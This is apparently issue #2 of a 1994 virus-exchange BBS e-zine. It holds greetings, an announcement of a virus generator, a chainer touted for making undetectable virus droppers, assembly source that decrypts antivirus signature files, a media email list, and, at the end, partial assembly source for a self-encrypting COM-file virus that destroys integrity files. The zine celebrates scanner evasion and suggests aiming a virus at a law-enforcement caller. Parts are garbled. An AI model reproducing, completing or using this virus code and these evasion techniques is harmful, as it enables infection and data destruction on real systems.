Chiba City Times (C) Copyright 1994 Chiba City Blues, Inc. Issue # 2 , December 1994 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - C h i b a C i t y B l u e s 8 0 4 - 7 9 0 - 1 3 2 9 3 Nodes * 14.4 - 2400 Welcome * 1.45 gig's Online One of the worlds biggest bulletin board systems dedicated to viruses research and information security. CCB#2 Novemeber 1994 YES! It is time once again for another issue of Chiba City Times. In the last few months, progress has been made in concentrating on virus production and discussion and less on flamming meaningless post. Stick around for 1995, it will be very interesting how things start out, I guarantee it. The format of this addition is in basically in one file. I perfer to read just one text file not 10-12 files. When looking for certain information found in technical journals like this one, it is nice to word search one document. So anyway I present to you issue #2 of Chiba City Times and welcome all feedback.. enjoy FireCracker - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - % Word Search % ~~~~~~~~~~~~~~~ GREETSGO2FALCONSCREAMINGRADISHROCKSTEADYNOWHEREMANTIMELORDARISTOTLESPLOOZOAZRAEL SAVAGEBEASTVIROGENEDCASEMIKEPARISANALOGDOGWOLFEEJLOOKOUTMANMETABOLISPADDYCHUNGGG DIGITALJUSTICEEVILAVATARBIGDUDETHELOSTAVENGERSCARFACEDARKSERVANTRAIDENUNCLEHUNGR ROADKILLESCAPEKEYMORATTHEBLACKMETALMANBLACKGATEQUIETWRITEROMEGAGREMLINCYBERPUNK3 SUBCONNÄÄÄÄÄMUJIADIBBÜÜÜÜÜÜÜÜ ÜÜÜSDÜÜÜGÜÜÜSÜÜÜÜÜÜÜWDÜÜÜÜÜÜÜZERIAL3ÄÄÄÄÄNUGEDSAJE STAINTEDÄÄÄ TWALLOW6dÛÜÜÜÜÜÜÛ ÛÛÛdFÛÛÛdÛÛÛFÛÜÜÜÜÜÛdHÛÜÜÜÜÜÛQUARKA23ÄÄÄELECTRON87 THEQUESTIONMALADOR155ÜÜÜsDj3sEÛÛÛÜdÛÛÛdÛÛÛKÜÜÜÜÜÜÜÜ2ÜÜÜÜÜÜÜTALONTIPHOIDMARYDEATH BOYjÄÄÄÄÄ ÄÄÄÄÄSJEKFFÛÛÛDKDSJjÛÛÜÛeÛÛÛSÛÛÛeÛÛÜÜÜÜÛÛAÛÛÜÜÜÛÛ4CdsÄÄÄÄÄ ÄÄÄÄÄLFDIU4 Y2WDDÄÄÄdECÄÄÄjSVjA8eÛÛÛSjDj2aÛÛÛKeÛÛÛeÛÛÛRÛÛÛeRÛÛÛ3ÛÛÛeÛÛÛ3D3DwÄÄÄwFwÄÄÄMKJRWEI HARFBEÄd3DSaÄDSCEDE3sÛÛßßßßßÛsÛÛÛaXÛÛÛ3ÛÛÛeÛÛßßßßÛÛeÛÛÛeÛÛÛSsCjsFÄdFsjFÄLKANSDFJ GARBAGEHEAPTIMELORDSHJHSÜÜÜÜÜÜÜÜxÜÜÜsÜÜÜÜÜÜÜÜÜsÜÜÜs2sÜÜÜMEMORYLAPSEPRIESTJESUSSL UTFUCKERGRAVITYSRAINBOWDÛÜÜÜÜÜÜÛcÛÛÛdÛÜÜÜÜÜÜÜÛ Û ÛsD2Û ÛTHESERPENTANDTHERAINBOWu INVALIDMEDIAMRTWISTERP7DÜÜÜc2EWXDÛÛÛdSdcÜÜÜs4RsÛ ÛÜÜÜÛ ÛQBRUFIRECRACKERBIGDUDESH RADIXTHEINSOLENTJACKELD2ÛÛÛaDCCXEÛÛÛddRcÛÛÛEs4sÛÜÜÜÛÜÜÜÛHADESALUCARDRATBOYHFGDST YOHOYIPSNAKEEYESSPEAKSTOÛÛÛANIMALÛÛÛSRDcÛÛÛWINDSURÛÛERTERMINATORBIGDUDENIRVANASC ARANDANYONEELSEIFORGOTESÛÛßßßßßÛdÛÛÛc2S1ÛÛÛsdEDf32ÛÛDDWHOISVLADPLEASETELLUSTALON NOTHINGONTOPBUTABUCKÜÜÜÜÜÜÜETÜÜÜANDMÜÜÜOPÜÜÜAÜÜÜÜÜÜÜNÜÜÜÜÜÜÜDAILLUSTRATEDBOOKABO TBIRDSSEEALOTUPTHEREÛÜÜÜÜÜÛBUÛÛÛTDONÛ ÛTBÛ ÛEÛÜÜÜÜÜÛSÛÜÜÜÜÜÛCAREDWHONEEDSACTIONS WEYAGOTWORDSDY4UHG47ÜÜÜÜÜÜÜÜ6ÛÛÛ7YHJÛ Û7EÛ ÛEÜÜÜÜÜÜGJÜÜÜÜÜÜÜRRDFH98RY846RJYW98R6 HKTHISISTHEUNDERGROU ÛÜÜÜÜÛÛNÛÛÛDE3BÛÛÛR8ÛÛÛJÛÛÜÜÜÛAKÛÜÜÜÜÛÛ8YSHALLWEPLAYAGAMEOF FEIUFORSLKFGRKJGWJFYÛÛÛ7YÛÛÛ7ÛÛÛHFDIÛÛÛR9ÛÛÛYÛÛÛFYW8YH4YYÛÛÛCHESSFIHDFIUYE7YRW4I DR7ADEQWSAQLWEKK987YÛÛßßßßÛÛFÛÛßßßÛFÛÛßßßßÛÛFÛÛßßßßÛEÛßßßßÛÛSJDYF7ISD6F98Y4WKJHC FSF3DADSEWFDADSKFDSKßßßßßßßßTßßßßßßJßßßßßßßßTßßßßßßß6ßßßßßßß654HJ5DHWS653HGYSDFD XEUIHADSDDSW93KD873JDJDLKDF9843HJHFDS76Y3JHDS76Y32JHD83JFKDSJFMSDMNCKXNCJSDHHF7 FFDISUHGFIUY96Y3NKDFLESDSLdJFIePOR3WUKdJGFbIORseUGRewHWFfg3QKeFBewIwYw73232YQKJS % Headspin.exe % ~~~~~~~~~~~~~~~~ OK, FireCracker wanted a quick little 3-D thingy for Chiba City Times so... here it is - Chiba City Headspin. Graphics are in a low res mode, so it should run on most any 386 or above with about 500k base memory. Slower systems, and laptops with poor video will suffer. Also...for all you virus programers out there...I know it's big (over 2.7 megs) for such a short run, but hey! I'm an artist, not a programer! Greetings out to members of NuKE, Phalcom Skism, Lord Rook, Aristotle (yeh, John!) Grady, Gate Keeper, Rock Steady, Savage Beast, Screaming Radish, Yoho Yip, Falcon, and others... Wolfee % NuKE Random Life Generator % Written By Azrael,[NuKE] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Generator is actually nothing that is really new to the virus exchange community. It is a virus generator that was released in June 1994 by a member of NuKE named Azrael. He is the sysop of The Satanic brain bbs in South America. While it is diffucult for us to communicate because of a language barrier, we seem understand the topic. It is apparent a few people around the world have played with this generator, but I do not believe that the major vx population has had a chance to play with it. When last I talk to Azrael, it appeared a newer version of the NRLG will be out sometime near the first of the year without some of the encryption bugs that have popped up now and then when I was testing it. I think this effort to introduce another GUI interface with a virus producing product is exactly what the virus community desires. Anyway enough of the running of the mouth, unzip nrlg.zip into a directory and run nrlg.bat Have fun and enjoy... also remember to send Azrael some criticism so that he can improve his utility. % Fellow Sysops beware! % ~~~~~~~~~~~~~~~~~~~~~~~~~ Underground QWKs Restricted Last Updated: Wednesday, August 10th, 1994 at 8:21pm 4 files - 615,030 bytes Filename Bytes Date File Description ÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ CHIBA615.ZIP 192528 06-15-94 QWK Mail Packet from Underground BBS Called: "The Streets of Chiba City" NOTE: This Board is the Main Distribution Hub for the NukeNet, America's Lagest Virus Writing Network! Good Intelligence Source! Location of BBS: Richmond, VA Area QWK Mail Packet Retrieved 6-15-94 CHIBA76.ZIP 163899 07-06-94 QWK Mail Packet from Underground BBS Called "The Streets of Ciba City" QWK Mail Packet Retrieved 7-6-94 CRIS615.ZIP 62510 06-15-94 QWK Mail Packet from CRIS BBS Technicaly this BBS is not classified as a member of the underground networks. However, they do exchange viruses ONLINE and echo the EMAIL conferences of NukeNet, VirEx as well the legitimate FIDO Virus related echos and their own CRIS Net. Still a VERY good source of information and intelligence. Location of BBS: Chicago, Illinois QWK Mail Packet Retrieved 6-15-94 CRIS706.ZIP 196093 07-06-94 QWK Mail Packet from CRIS BBS QWK Mail Packer Retrieved 7-6-94 @x07 This is a screen capture from a bbs that was run by a security officer of the United States Customs Agent in Indiabapolis IL. After I received this info from a user of Chiba City, I searched through all the logs and found who this indiviual was and decided to call and see what the deal was. I was told that the qwks were available for other federal law enforcement agencies to download to keep track of bbs' off tag lines. In a diplomatic way I let it be known that I did not agree with what was going on and though that the words like "underground" and ". . good source of intelligence" were misleading and suggested that illegal activities might be going on in Chiba City. I think I made my point quite well needless to say he has not called back under that account name since we last talk and not that it would matter, we cannot stop them from calling but a good virus from that side of the fence or maybe a post would be great. % Fun with Mini-Chainer % ~~~~~~~~~~~~~~~~~~~~~~~~~ Usually when I start playing with a virus, I generally grab 4 or 5 utils off the bbs to use as bait files for the virus. I run them on a notebook to see how it works with a real file. So one day I am grabbing a bunch of utils off the board when I came across something called MC.zip. I found when I ran the program that it was a com/exe chainer util. After playing with the program for a little bit, I got a cool idea. Lets take a virus , stick it in with another util and see if mr scanner picks it up. Tried mcaffe, you should already know the answer to that, F-prot 2.14 was next, notta. So I said hell tbav set on high huerestic blows sirens on just about any file that calls int21h so that is sure to do something, nope! I played with the utility a little more trying differnt viruses and could not get it to scan. What a useful util I thought to myself, then laugh and determined that I should share it with everyone. Have fun with this util that I have supplied with this addition of The Times. Just run it and have one virus and one "util" to test it on and bam you got a undectable dropper file.. Brings old viruses back to life for a short period of time. File name to look for is MC.EXE % ALL THINGS MUST COME TO AN END % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 10/31/94 Will be the last day for the hell pit. (11:59 pm). This has nothing to due with legal problems, or the low IQ monkeys who leave messages like "die fed." From now until we shut down, all files are FREE. Call everyone you know who is a member, and spread the news. No new users will be accepted from now on as there is no point in that anymore. I am sure that by now our entire collection of files is spread among the public that makes up most of the underground around here, so hopefully the will resurface and not go to waste. I'd like to thank everyone who ever contributed to the system, including the first callers that we had when we went up four years ago. (You know who you are). So long and thanx for all the fish, and live knowing only that we may 3 return... but not in this incarnation. The Staff % TBAVSIG % ~~~~~~~~~~~ ûirogen's Thunderbyte Anti-Virus Signature File Reader version 2.0 for TBSCAN.SIG v6.22 Coded by ûirogen The Adjacent Reality BBS [615.586.9515] Jeremy.Collake@hal9k.com ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Welcome to the latest VG-TBSIG version; that'z right, the assholes at ThunderByte decided to change their TBSCAN.SIG file format somewhat (specifically the encryption). It wasn't that difficult to defeat - but it was somewhat more involved this time. I've distributed the complete source code and format (as much as I know) of the TBSCAN.SIG file. Feel phree to make any enhancments you wish as long as you redistribute the source code and give credit to the original author [thatz me], and any authors of new mods. Usage ÄÄÄÄÄÄÄÄÄÄÄÄ Place VG-TBSIG.COM in the same directory as TBSCAN.SIG and run.. the output is via DOS, so you can redirect it to a file. eg: VG-TBSIG > TBSIGS.TXT You'll get a listing of all signatures for virii and other programs defined in the data file. XCEPT, there are 7 virii defined differently than the rest - I believe they are polymorphic virii which TBSCAN does not trace thru the decryptor to scan the original code. The groups of two hex bytes (4 ascii bytes) surrounded by '_'s are wildcards, and are defined as shown below in the technical info. Technical Info ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ WildCards/Variable Positions: UserDef Ex Description Signature String ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ?n = Skip n amount of bytes and continue. = 388n ?@nn = Skip nn amount of bytes and continue. = 38nn (see note 1) nn should not exceed 7F. *n = Skip up to n bytes. = 384n *@nn = Skip up to nn bytes and continue. = 38nn (see note 1) nn should not exceed 1F. nL = One of the values in the range n0-n7. = 382n nH = One of the values in the range n8-nF. = 383n þnote1: The highest bit is set to 1 provided nn is in the range suggested above. If it exceeds that range, then the highest bit is not set to 1. þnote2: I believe all 00 bytes in the signatures are interpreted as wildcards. Example: Virus : PC-Flu_II ÀÄSignature : 50_383B_2001_3882__383B__3884__383B__3848_2E30_384E_E2 Xlation : 50 Bh 2001 ?2 Bh ?4 Bh *8 2E30 *E 12 Format of TBSCAN.SIG: There are two types of blocks in the data phile; I didn't need all the info from them so I didn't goto the trouble of filling in the missing blanks. The data blocks start at offset 80h in the phile. 1) for virii which have multiple-scan strings defined, or some algorithmic approach (polymorphic): byte 0 = If 0FFh then no more entries 1 = 0FFh 2 = ? 3 = ? 4 = ? 5 = ? 6 = ? 7 = ? 8 = ? 9 = ? A = length of virus name B = ? C = index to virus name (from start of block) D = ? E = index to next data block (from start of block) ptr to next block calculation: oldptr+ byte Eh 2) for normal virii: byte 0 = if 0FFh then no more entries 1 = if 0Fh then non-virus entry or special entry 2 = ? 3 = ? 4 = if bit 6 = 1 then entry is user-defined 5 = ? 6 = ? 7 = length of signature 8 = length of virus name 9 = ? A = start of virus name ptr to next block calculation: oldptr+ 0Ah+ byte 7h+ byte 8h Encryption of Virus Names: The virus names are encrypted in the following technique, which is actually a form of compression; if you'll notice every encrypted word decrypts to three bytes. þ string XORed by A5h þ NULL appended at end for stop point of next loop þ string then processed thru the following loop: assume si=start of string, di=new location, bx=table [alphabet_. ,] start: lodsb ; get byte test al,al ; not all chars compressed/crypted.. js continue stosb ; store byte jnz start ; 0 designates end of string ret continue: mov ah,al ; save byte lodsb ; get next byte mov dx,ax ; save retrieved word mov al,ah ; process first byte retrieved shr al,1 ; shift-right .. [xtract nibble] shr al,1 call xlation ; xlat- stosb- ret:ax=dx shl ax,1 ; shift-left shl ax,1 shl ax,1 mov al,ah call xlation ; xlat- stosb- ret:ax=dx call xlation jmp start xlation: and al,1Fh dec ax xlat ; xlation table defined below - al=bx[al] stosb ; save byte mov ax,dx ; restore retrived word ret table db 'abcdefghijklmnopqrstuvwxyz_. ,' Encryption of Virus Signatures is a simple byte XOR by A5h. History ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1.0 - Initial release - 07-04-94 1.01 - Minor bug fix - - 07-04-94 (yes the same damn day) If two wildcards were located in a sequence, the second would not be designated by the '_'s. 2.0 - Updated to read new TBSCAN.SIG - 07-19-94 format in version 6.22 Have phun! Live to die. ûirogen '94 The AR 615.586.9515 Jeremy.Collake@hal9k.com ***Note on internet address*** If you send me mail to that address, I may or may not recieve it.. just call my board if you get no response. ******************************* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAixt9g4AAAEEANN3KDJ5NjmN1bm5cQGs352wJsQH6FBtOgnHEpZczJBXBwU1 HiMIL0a4ST16h/flarD2Jsekk5KMz0XF0/+ZAy98Ng3AglsWT+9mXnYxlnUwMaIc 0QeCU8ECQzQSRzSznWidEKsemYLC179eOEfOqNeYR5NndCo3mVS0HwB6IcbpAAUR tAdWaXJvZ2Vu =Hvsw -----END PGP PUBLIC KEY BLOCK----- section 1 of uuencode 5.24 of file vg-tbsig.com by R.E.M. begin 644 vg-tbsig.com MNJ@"Z)\`M#VZ@0+-(7,#Z8P`D[0_NDL$N0#PS2&T/LTAN\L$,\DSP/8'_W1W M@'\!_W4=B_,#=PR+3PI)Z,,`NL(#Z&``NAD$Z%H``U\.Z]3V1P)`=`:ZG@/H M20"-=PJ*3PC&!N8#`.B8`/9'`0]T!;JU`^L#NJP#Z"H`NAD$Z"0`BD<'C5\* M`]F+R(OS_@;F`^AN`+\9!`/9Z!``ZX:ZC`+H`0##M`G-(3/`PU.ZUP.T"`2J=?C#BN"L MB]"*Q-#HT.CH$`#1X-'@T>"*Q.@%`.@"`.O9)!](4[MC`M=;JHO"PV%B8V1E M9F=H:6IK;&UN;W!Q'EZ7RX@+%1"4T-!3BY324<`#0I%2#[:7)O9V5N#0H@("`@ M("`@("`@("`@_B!697)S:6]N(#(N,"!F;W(@5$)30T%.+E-)1R!V-BXR,B#^ M#0H@("`@("`@("`@(%1H92!!9&IA8V5N="!296%L:71Y($)"4R!;-C$U72XU M.#8N.34Q-0T*Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$ MQ,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q,3$Q`T*)"`@)%5S97(@ M1&5F:6YE9"`D5FER=7,@.B`D3F]N+59Iascii ..cx=len..di=ptr push bx ; save block ptr lea dx,sig_stg ; indicate signature mov ah,9 int 21h mov bp,cx ; use BP as counter xor dx,dx hloop: mov bh,byte ptr [di] ; get byte dec dh ; decremt wc mark ctr cmp dh,1 ; time for trailing '_'? jnz no_trailer call disp_mark ; display trailer no_trailer: cmp bh,38h ; wildcard? jnz no_wcard no_adj: mov dh,3 ; setup counter to put trailing '_' call disp_mark ; indicate wildcard no_wcard: call byte_disp ; display as ASCII inc di ; increment ptr dec bp ; dec counter jnz hloop ; loop.. lea dx,pair ; display cr/lf call disp pop bx ; restore block ptr ret byte_disp: ; display hex->ascii byte, bh=byte mov ch,2 ; two ascii chars, two hex nibbles bloop: mov cl,4 rol bx,cl ; rotateL 4 bits, setup next nibble mov dl,bl and dl,0Fh ; kill other nibble add dl,30h ; +30=3xh -> ascii numeric digit cmp dl,3Ah ; numeric or alphabetic? jl no_add ; add dl,7 ; add if alphabetic no_add: call disp_one ; display 'de char man dec ch ; decrement counter jnz bloop ret disp_mark: mov dl,'_' disp_one: mov ah,2 int 21h ret decrypt: lea di,first_dec push cx cx di ; save string len&ptrs l1: lodsb ; get xor al,0A5h ; XOR by A5h stosb ; store loop l1 xor al,al ; append 0 stosb pop si cx lea di,print_stg cmp sig,0 ; sigs don't go thru second loop jz is_name sig_cpy:rep movsb ; copy sig for display jmp is_sig is_name: call decrypt2 is_sig: mov ax,0A0Dh ; append cr/lf stosw mov al,'$' ; append '$' stosb xor ax,ax pop cx ; restore slen ret decrypt2: ; decompression/decryption loop #2 lodsb ; get byte test al,al ; not all chars compress/crypted js get_nb stosb ; store byte jnz decrypt2 ; continue loop if !0 _ret: ret get_nb: mov ah,al ; save byte lodsb ; get next mov dx,ax ; save word mov al,ah ; start on second byte retrieved shr al,1 ; shift right [xtract nibble] shr al,1 call decrypt3 ; xlat -stosb- ret:ax=dx shl ax,1 ; shift left shl ax,1 shl ax,1 mov al,ah call decrypt3 call decrypt3 jmp decrypt2 ; continue loop.. decrypt3: and al,1Fh dec ax push bx lea bx,table ; bx points to xlation table xlat ; al=bx[al] pop bx stosb ; store byte mov ax,dx ; restore retrieved word ret table db 'abcdefghijklmnopqrstuvwxyz_. ,' fname db 'TBSCAN.SIG',0 error_msg db 0Dh,0Ah,'Error opening TBSCAN.SIG!','$' intro_msg db 0Dh,0Ah," ûirogen's Thunderbyte Signature File Reader - Coded by ûirogen" db 0Dh,0Ah,' þ Version 2.0 for TBSCAN.SIG v6.22 þ' db 0Dh,0Ah,' The Adjacent Reality BBS [615].586.9515' db 0Dh,0Ah,'ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ' pair db 0Dh,0Ah,'$' space db ' ','$' user_stg db 'User Defined $' v_stg db 'Virus : ','$' nv_stg db 'Non-Virus : ','$' pv_stg db 'Polymorphic Virus : ','$' sig_stg db 'ÀÄSignature : ','$' sig db 0 ; 0 if name, !0 if sig being processed first_dec db 50 dup(0) print_stg db 50 dup(0) ; 50+first 80h in buffer available buffer: cseg ends end start % Media Netmail % ~~~~~~~~~~~~~~~~~ ---------------------- Media on Internet list ---------------------- What follows is a list of newpapers and other mass media outlets which have some form of contact via internet. This is nowhere near as comprehensive as it should be, so if you know of a paper which should be added, or of corrections to be made, drop me a line giving details. If you plan on writing a letter or note to any of the following media, don't forget to include your name, address and daytime phone. If you can't find a listing where you expect it, check at the very end, where new entries have been placed. These either have not been alphabetized yet, or their geographic location could not be ascertained by my under rested thinking organ. If you can't find it there, submit a correction / addition. ST CITY MEDIA OUTLET NAME INTERNET ADDRESS CONTACT AK Anchorage Daily News 74220.2560@compuserve.com AL Birmingham Blazer Tribune kpate@vprua.vprua.uab.edu Ken Pate AL Birmingham WYDE-AM tony.giles@the-matrix.com Tony Giles AL Mobile WALA-TV gripper@aol.com Bob Grip AR Little Rock KARK newsfour@aol.com AZ Phoenix Phoenix Gazette phxgazette@aol.com AZ Tuscon KUAT-TV, PBS comments@kuat.arizona.edu BC Vancouver Vancouver Columbian vanpaper@aol.com CA Contra Cost CC County Times cctletrs@netcom.com CA Los Angeles Fox TV Network foxnet@delphi.com CA Los Angeles Urb Magazine urbmag@netcom.com CA Palo Alto Palo Alto Weekly paweekly@netcom.com. CA Palo Alto KZSU-FM info@kzsu.stanford.edu releases@kzsu.stanford.edu CA Sacremento Sacremento Bee sacbee@netcom.com sacbedit@netcom.com CA San Diego SD Union-Tribune computerlink@sduniontrib.com CA San Diego APR "Marketbasket" market@mizar.usc.edu CA San Francis Associated Press weise@well.sf.ca.us On the Net Col. CA San Francis KDFC-AM/FM ------------------- General comments comments@kksf.tbo.com News releases news@kksf.tbo.com CA San Francis KKSF-FM SAME AS KDFC-AM/FM CA San Francis KPIX-TV, CBS 74001.3461@compuserve.com CA San Francis SF Examiner sfexaminer@aol.com CA San Francis SF Examiner Mag. sfxmag@mcimai.com CA San Francis Whole Earth Review wer@well.sf.ca.us CA San Francis U. Magazine umag@well.sf.ca.us CA San Jose Mercury News ------------------ -------------- Editorial Columnist JOJACOBS@aol.com JoanneJacobs Environment Writer STHURM@aol.com Scott Thurm Editorial PHILIPY809@aol.com Phil Yost CA San Jose OutNOW! jct@netcom.com CA San Jose The Spartan Daily MEAGHER@sjsuvm1.sjsu.edu Jason Meagher (408)924-3280 Ed. (408)924-7932 V-mail CA San Luis Ob KCBX kcbx@slonet.org CA San Mateo San Mateo Times smtimes@crl.com CA Santa Cruz Cruz Cnty Sentinel -------------------- --------------- Voice (408)423-4242 kevinw@cruzio.com Kevin Woodward Letters to editor sented@cruzio.com News desk sentcity@cruzio.com CA Santa Cruz KUSP-FM kusp@cruzio.com CA Santa Rosa The SRJC Oak Leaf roger@well.sf.ca.us Roger Karraker CA Santa Rosa Silueta silueta@wave.sci.org CA Travis AFB Tailwind paffairs@EMH1.TRAVIS.AF.MIL TSgt. DC Washington Aviation Daily grahamg@mgh.com DC Washington Journal Newspaper thejournal@aol.com DC Washington National Pub Radio ---------------------- Mon.Radio Letterbox letterbox@wshb.csms.com Talk of the Nation totn@aol.com Science Friday scifri@aol.com Fresh Air freshair@hslc.org West Coast Live west_coast_live@netcom.com Weekend ATC watc@cap.gwu.edu Weekend Ed./Sunday wesun@clark.net DC Washington PBS "POV" povonline@aol.com DC Washington Surveillant,Mil Int 70346.1166@compuserve.com DC Washington U.S.News&World Rpt vic@access.digex.net Vic Sussman Voice (202)955-2093 Fax (202)955-2549 DC Washington USA Today usatoday@clark.net DC Washington VOA/Worldnet TV ------------------- From outside the US letters@voa.gov From within the US letters-usa@voa.gov QSLs outside US qsl@voa.gov QSLs inside US qsl-usa@voa.gov Agriculture Today agri@voa.gov VOA-Europe(English) voa-europe@voa.gov VOA-Morning Program voa-morning@voa.gov FL Miami Sun-Sentinel vineeditor@aol.com FL Orlando GQ Magazine gqmag@aol.com FL St.Petersbu St.Petersburg Times 73174.3344@compuserve.com FL Tallahassee Tallahasse Democrat letters@freenet.fsu.edu IA Des Moines WHO-AM news@who-radio.com IA Iowa City Icon icon@igc.apc.org IL Chicago Playboy playboy@class.com IL Chicago The Tribune tribletter@aol.com ericzorn@aol.com Eric Zorn IL Chicago The Sun Times decc@cs.uchicago.edu Don Crabb Voice (312)702-7173 Fax(312)702-9417 IL Chicago WBBM-TV, CBS wbbmch2@aol.com IL Chicago WGN-TV wgntv@aol.com IL Evanston Daily Northwestern daily@merle.acns.nwu.edu IL Glen Ellyn WDCB Radio scotwitt@delphi.com IL Park Forest 2nd Amend. Caucus gunsmoke@bgu.edu Karl Rademacher IL Peoria Peoria Journal Star xxnews@heartland.bradley.edu IL Peoria WEEK-TV xxweek@heartland.bradley.edu IL Springfield Illinois Issues wojcicki@eagle.sangamon.edu. IL Univ. Park The Innovator gsurag@bgu.edu Jeff Dinelli Voice (708)534-4517 IL Urbana News-Gazette gazette@prairienet.org IN Greencastle DePauw Magazine mlillich@depauw.edu KS Lawrence C User's Journal cujsub@rdpub.com MA Cambridge Sky & Telescope skytel@cfa.harvard.edu MA Cambridge The Tech ------------------ ------------- News news@the-tech.mit.edu Spots sports@the-tech.mit.edu MA Boston Bay Windows baywindo@world.std.com MA Boston The Boston Globe multiple listings letters to editor letter@globe.com MA Framingham Middlesex News multiple listings general news@news.ci.net letters to editor letters@news.ci.net op ed page oped@news.ci.net The Answer guys guys@news.ci.net MI Albion Student Newspaper cleverett@albion.bitnet Chris Leverett MI Detroit WXYZ-TV, ABC Affil. wxyztv@aol.com MI Flint Flint Journal fj@flintj.com MI ? Student Movement smeditor@andrews.edu ME Maine PubTV "Media Watch" greenman@maine.maine.edu MN Minneapolis Minnesota Daily network@edit.mndly.umn.edu. MN Minneapolis Training Magazine trainmag@aol.com MN Minneapolis Twin Cities Reader sari23@aol.com MN Minneapolis WCCO-TV wccotv@mr.net MN St. Paul Pioneer Press vpress@aol.com MO Columbia KOMU-TV, NBC swoelfel@bigcat.missouri.edu. MO St. Charles St.Charles Countian pacmosteve@aol.com MO St. Louis KWMU-FM kwmu@umslva.bitnet MO Springfield News-Leader --------------------- -------------- Letters to editor nleditor@ozarks.sgcl.lib.mo.us Press releases nlnews@ozarks.sgcl.lib.mo.us ; --==TWISTBP.ASM==-- ; ; This program is for eductional purposes only. The author takes no ; responsibilty for any use or misuse of this program. (Generic Disclaimer) ; ; -Appending *.COM infector ; -Random encrpytion using dos get time funtion ; -Preserves original file date and time ; -Three infections per run ; -Nuke those pesky NTZ files off the face of the EARTH ; -A encryption routine big enought to get 10 signatures ; -Unscanable by Tbav - Ha Ha another Twist variant? ; -F-prot scans the original virus as a Trival variant ; -= Thanks to FireCracker, Memory Lapse, Viper, Talon ; -= Qark, and everyone else that responded to my stupid ; -= messages. ; -= A special thanks to all the NuKE Members ; ; Mr. Twister, NuKE ; ; Assemble tasm twistbp ; link with tlink /t twistbp .model tiny .radix 16 .code org 100h byt equ end_it - ntz_nuke virus_size equ end_it - start start: xchg si,si ; just filling space nop ; infection marker nop ; infection marker call loc_1 ; do the call to push called location loc_1: pop bp ; onto the stack then pop into bp sub bp,107 ; sub 107 to get back to -0- call decr ; on the first run the encrypt value ; is -0- so no change on subsquent ; runs the random value is stored into ; enc_val so file is decrypted jmp where ; this is the actual virus what: call enc ; encrypt the main part of the virus mov ah,40 ; Write file mov cx,virus_size ; Write the virus size lea dx,[bp+offset start] ; Load the offset of the ; virus into dx int 21 ; dos function inc [bp+counter] ; got one increase the counter jmp $+2 ; Thanks Screaming call decr ; decrypt the virus so we can continue ret ; return back to the main body nop ; marker nop ; marker nop ; marker enc_val db 0 ; this is the value that we will counter db 0 ; encrypt with, its zero to start nop ; then changes on subquent infections nop ; marker enc: mov ah,2c ; dos get time function int 21 ; dos does it mov [bp+enc_val],cl ; move the minute into the encryption ; value, this allows for 59 variations decr: mov cx,byt ; byt is the number of bytes to xor lea si,[bp+offset Ntz_nuke] ; point si at the start of the actual ; virus dec_lp: lea di,[bp+offset buff] ; point di at the buffer movsb ; move the byte at si into the buffer mov al,[bp+offset buff] ; move the buffer into al xor al,[bp+enc_val] ; xor the al with the enc_val mov [bp+offset buff],al ; move the byte back into the buffer lea di,[si-1] ; point di back to where the byte came from lea si,[bp+offset buff] ; point si at the buffer movsb ; mov si to di buffer back into the virus mov si,di ; movsb increments after each use loop dec_lp ; loop X number of times X=byt ret ; done with this function bail ntz_nuke: mov ah,4e ; Find the first match get_ntz: lea dx,[bp+offset Ntzmask] ; Load the offset filemask dx int 21 ; dos call jc do_again ; can't find continue infection lea dx,[bp+offset end_it+1e]; Load the offset fname (á) Mov Cl, 7Ah ; This loads 7a04 into ax Xchg Ah, Cl ; shr makes 7a04 into 3d02 Mov Al, 04h ; ' ' Shr Ax,1 ; Open The File Up int 21 ; dos does it mov bx,ax ; move file handle into bx mov ax,4202 ; go to the end of the file xor cx,cx ; zero these two register or xor dx,dx ; you'll get very wierd results int 21 ; thanks dos mov [bp+how_much],ax ; ax is the file size we want to get ; it all xor cx,cx ; zero these two register or xor dx,dx ; you'll get very wierd results mov ax,4200 ; move back to the front of the file int 21 ; thanks dos push cs ; cs and ds are the same pop ds lea dx,[bp+New_dta] ; write the information to the file ; from the new dta area mov cx,[bp+how_much] ; how much are we going to smear xor ax,ax mov ah,40 ; write file function int 21 ; dos call mov ah,3e ; close the file int 21h ; dos call mov ah,4f ; search for another one jmp get_ntz ; go back to the start do_again: ret ; only jumps here when sure no more ; exists where: lea bx,[bp+offset return_bytes] ; Load the address ; of bp plus the original offset ; of return bytes into di. push ds:[bx] ; push the first two bytes of the ; original program onto the stack add bx,02 ; increase di to point to the next ; two bytes we saved of the orig prog push ds:[bx] ; push the last two bytes we saved ; of the original program onto the ; stack mov ah,1a ; Set DTA lea dx,[bp+offset end_it] ; Load the effective address ; of the end of the virus to ; be used for the new DTA int 21 ; dos call call ntz_nuke ; see ya Ntz mov 